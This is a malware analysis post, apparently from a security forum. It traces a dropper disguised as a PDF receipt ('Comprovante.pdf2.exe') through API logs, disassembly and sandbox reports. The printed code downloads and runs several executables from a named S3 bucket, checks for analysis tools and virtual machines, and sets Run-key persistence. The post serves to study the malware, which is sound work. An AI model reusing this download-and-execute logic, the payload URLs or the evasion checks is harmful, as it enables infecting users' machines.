CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(tapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
RasEnumEntries() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(RASMAN) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(WinNT,WinNT) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt40.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(cryptdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iphlpapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(Sens) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(sensapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetOpen() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetConnect(s3-sa-east-1.amazonaws.com) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(hnetcfg.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
bind(port=0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:2673 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(crypt32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZoneAttributeCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesLockedCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpSendRequest() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasadhlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:9666 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateProcess((null),C:\wina\Projeto.exe,(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ExitProcess(0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(RegWatcher.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(arwwdwin.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]

In the root of the drive it creates a hidden system folder "wina" where the downloaded files are stored:

Code:
CODE:0045404B                 push    0
CODE:0045404D                 push    0
CODE:0045404F                 push    offset aCWinaJjca_dll ; "C:\\wina\\jjca.dll"
CODE:00454054                 push    offset aHttpsS3SaEast1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:00454059                 push    0
CODE:0045405B                 call    URLDownloadToFileA
CODE:00454060                 push    0
CODE:00454062                 push    0
CODE:00454064                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:00454069                 push    offset aHttpsS3SaEas_0 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045406E                 push    0
CODE:00454070                 call    URLDownloadToFileA
CODE:00454075                 push    5
CODE:00454077                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:0045407C                 call    WinExec
CODE:00454081                 push    0
CODE:00454083                 push    0
CODE:00454085                 push    offset aCWinaJsobs_exe ; "C:\\wina\\jsobs.exe"
CODE:0045408A                 push    offset aHttpsS3SaEas_1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045408F                 push    0
CODE:00454091                 call    URLDownloadToFileA
CODE:00454096                 push    0
CODE:00454098                 push    0
CODE:0045409A                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:0045409F                 push    offset aHttpsS3SaEas_2 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540A4                 push    0
CODE:004540A6                 call    URLDownloadToFileA
CODE:004540AB                 push    5
CODE:004540AD                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:004540B2                 call    WinExec
CODE:004540B7                 push    0
CODE:004540B9                 push    0
CODE:004540BB                 lea     edx, [ebp-4]
CODE:004540BE                 mov     eax, offset _str_LOCALAPPDATA.Text
CODE:004540C3                 call    @Sysutils@GetEnvironmentVariable$qqrx17System@AnsiString ; Sysutils::GetEnvironmentVariable(System::AnsiString)
CODE:004540C8                 lea     eax, [ebp-4]
CODE:004540CB                 mov     edx, offset _str_Low_Sun_Java_De.Text
CODE:004540D0                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
CODE:004540D5                 mov     eax, [ebp-4]
CODE:004540D8                 call    @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004540DD                 push    eax
CODE:004540DE                 push    offset aHttpsS3SaEas_3 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540E3                 push    0
CODE:004540E5                 call    URLDownloadToFileA
CODE:004540EA                 mov     eax, ds:off_456734
CODE:004540EF                 mov     eax, [eax]
CODE:004540F1                 call    @Forms@TApplication@Terminate$qqrv ; Forms::TApplication::Terminate(void)
CODE:004540F6                 xor     eax, eax
CODE:004540F8                 pop     edx
CODE:004540F9                 pop     ecx
CODE:004540FA                 pop     ecx
CODE:004540FB                 mov     fs:[eax], edx
CODE:004540FE                 jmp     short loc_45410A

Download of the files and of the certificate:

(screenshot)


Files created and connection to the URL:

(screenshot)


Request for the file "sistema.html", not found on the server:

(screenshot)


Analysis of the file "jsob.exe":
Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,92) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(security.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(9078c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(607a0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(6079c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c07e4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(fwpuclnt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetForegroundWindow() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c076e) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(MSCTF.Shared.MUTEX.IKG) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPPROCESS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
QuerySystemInformation() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(System,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(smss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(csrss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(winlogon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(services.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(lsass.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxService.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(svchost.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieSvc.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(explorer.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxTray.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(ctfmon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(alg.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(idag.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(PE Explorer (portable).exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(notepad.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(EvO_DBG.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Comprovante.pdf2.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(sniff_hit.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsob.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(procexp.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Projeto.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsobs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(u1210.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(BSA.EXE,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieCtrl.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(wireshark.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(dumpcap.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieRpcSs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieDcomLaunch.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateFile(c:\wina\s33ass.txt) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]

Code:
 Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "jsob.exe=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
                 binary data=C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "MSCTF.Shared.MUTEX.IKG".
   * Enumerates running processes.
   * Contains string Traces of AutoStart registry key ("Software\Microsoft\Windows\CurrentVersion\Run")
   * Contains string Checks for Chrome browser software presence ("CHROME.EXE")
   * Contains string Anti-Malware Analyzer routine: Norman Sandbox detection ("CurrentUser")
   * Contains string Checks for FireFox browser software presence ("FIREFOX.EXE")

Code:
Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

Detailed report of suspicious malware actions:

